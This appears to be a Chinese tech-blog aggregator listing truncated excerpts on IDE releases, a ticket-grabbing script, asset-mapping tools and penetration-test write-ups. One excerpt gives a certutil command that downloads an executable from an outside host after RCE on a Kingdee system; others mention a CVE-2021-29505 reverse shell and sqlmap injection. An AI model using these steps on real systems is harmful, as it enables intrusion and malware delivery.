在 IntelliJ IDEA 2023.3.1 中，AI 助手已经不再处于技术预览阶段，而是经过了大幅改进，实现了令人期待的进展。此版本不仅全面支持最新的 Java 21 功能，还引入了直观的浮动工具栏，带有编辑操...

背景 JetBrains 在 2024 年度首个大版本更新（2024.1）中发布了多款 IDE 的更新，包括 IntelliJ IDEA、WebStorm、PhpStorm 和 PyCharm 等。 下面主要介绍 IntelliJ IDEA 2024.1 的变化。 Intell...

探索WebStorm 2024年首个主要版本的炫目功能：包括粘性行、文档改进、全行代码完成等，还有默认启用的Vue语言服务器和新的语言服务小部件。此外，还有许多版本控制改进和HTTP客户端增强等待你发...

下载并安装IntelliJ IDEA 请前往官网下载，我在这里使用的是最新版本的2023.2。我已经测试了2023的最新版本以及2022年之后的版本，均没有问题 安装然后打开 ，若提示需要输入激活码，请先关闭应...

当你目不转睛地盯着屏幕，手指飞速操作着一个自动刷新抢票脚本时，整个过程就像是在编织一张巧妙的网。 首先是 get_cookie 方法，它打开大麦网官网，引导你登录并保存登录后的 cookies。这些小...

工具简介： AsamF是一款集成多个网络资产测绘平台的搜索工具 AsamF，Asset survey and mapping 本程序仅供学习研究使用，请勿利用本程序损害任何个人或企业的利益，造成一切影响，开发者将不承...

前言 真实案例，文中所写漏洞现已经被修复，厚码分享也是安全起见，请各位大佬见谅哈！ 案例一：奇怪的找回密码方式 某次漏洞挖掘的过程中，遇到某单位的登录框，按以往的流程测试了一下发现并...

真实案例，厚码见谅，有些步骤可能有些忘记，截图并不是很全面。 金蝶云星空RCE shell之后尝试上线（出网）certutil -urlcache -split -f http://xx.xx.xx.xx/test.exe c:\test.exe这里exe的...

因为需要具体数据，所以要深入利用，手工肯定不方便，所以直接上 Sqlmap: Sqlmap也可以扫出该注入点，但想要进一步查询数据时，却发现Sqlmap利用不起来，无法查出数据: 为了确定查询数据失败原...

外网打点 信息搜集 FTP匿名登录 发现有FTP匿名登录，连接查看 漏洞探测 搜索Xstream漏洞，发现 https://www.cnblogs.com/thelostworld/p/14810682.html 尝试CVE-2021-29505 反弹shell   &n...

0x01 外网打点 资产发现 多测绘平台搜索 https://hunter.qianxin.com/https://fofa.info/https://quake.360.cn/ 多语法搜索 假如某个目标站点为xxxx.com ，我们可以通过不同的语法进行资产搜集...

在 CI 集成各种安全能力的过程中，最为痛苦的便是面对成千上百的仓库和分支，需要手动修改各种配置文件来加入安全扫描的步骤；通常情况下，在 Jenkins CI 过程内想要引入容器安全检测，需要手动...

第三天，你看着windowsConfig.jsp，config.jsp，心里想着，可算抓到你了，这回要把你全部，全部都属于我，可是，当你正兴高采烈逐步分析的时候，却发现，自己的数据库早已沦陷。。。 0x00 序言 ...

2022.8.X单位突然通知参与某行业专项攻防演练，本着学习的目的参与了一波，特此记录。 1、打点 获得目标单位名称 先通过爱企查、天眼查等工具查询目标及目标下属单位信息 可以利用工具：ENEScan...